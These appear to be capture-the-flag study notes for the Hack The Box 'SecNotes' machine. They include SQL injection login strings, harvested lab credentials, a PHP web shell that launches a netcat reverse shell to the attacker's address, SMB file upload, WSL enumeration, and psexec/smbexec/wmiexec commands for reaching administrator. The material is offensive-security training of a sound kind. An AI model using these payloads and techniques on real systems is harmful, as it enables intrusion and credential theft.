Search

Windows Subsystem for Linux

SecNotes Machine

Sign up to see regular user page

try XSS, SQL Injection, etc wherever there’s a page with input

Sign in with:

'OR 1 OR'

Register user as:

'OR 1 OR'

Login as injection user

Page output:

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

NOTE: \\something\something is probably SMB folder

New login!

PSExec?

psexec.py tyler:'92g!mA8BGjOirkL%OG*&'@10.10.10.97

not admin$, C$ is not writeable

found writeable share but cannot do the exploit

does not connect!!

explore the new site:

smbclient \\\\10.10.10.97\\new-site -U tyler
92g!mA8BGjOirkL%OG*&

we get in!

ls

to see what’s on it

Windows Server (IIS Windows) on 8808

Navigate to:

10.10.10.97:8808

Can we upload a file to gain shell?

spoiler: NO, something deletes files very quickly. Anti-virus or script that deletes anything that isn’t the default things supposed to be there

What if we NetCat?

find NetCat path in new tab:

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe nc.exe

Go back to SMB and:

put nc.exe

we uploaded nc.exe to the server

make a malicious PHP file:

<?php
system('nc.exe -e cmd.exe 10.10.14.3 4444')
?>

Kali IP used

open listener:

nc -nvlp 4444

garbage that doesn’t really work (assume it does for the exam)

once you get on the network:

whoami
systeminfo
sc query windefend #checks if windows defender is running

NOTE:

To find where bash and WSL are:

where /R c:\windows bash.exe
where /R c:\windows wsl.exe

To run WSL with a command:

copy the path it gave you and add:
whoami #after the wsl.exe and space

Run a bash:

copy and paste the path and hit enter to open a bash
whoami
hostname
uname -a #tells you what part of the system you're on. This is Linux subsystem rn

To get TTY shell:

python -c "import pty;pty.spawn('/bin/bash')"

resource for the TTY shell:

https://netsec.ws/?p=337

Current folder in Linux subsystem:

pwd
ls -la
history
sudo -L #if it runs

History will give you easy quick wins most of the time like plaintext password for admin/sudo

With that info, you can:

If using psexec.py

psexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97

and

Found writable share ADMIN$

but gets stuck at starting service. This means anti virus is blocking us (again). That means we can try to use the other execs to see if they go thru the antivirus

You can try:

smbexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97
OR
wmiexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97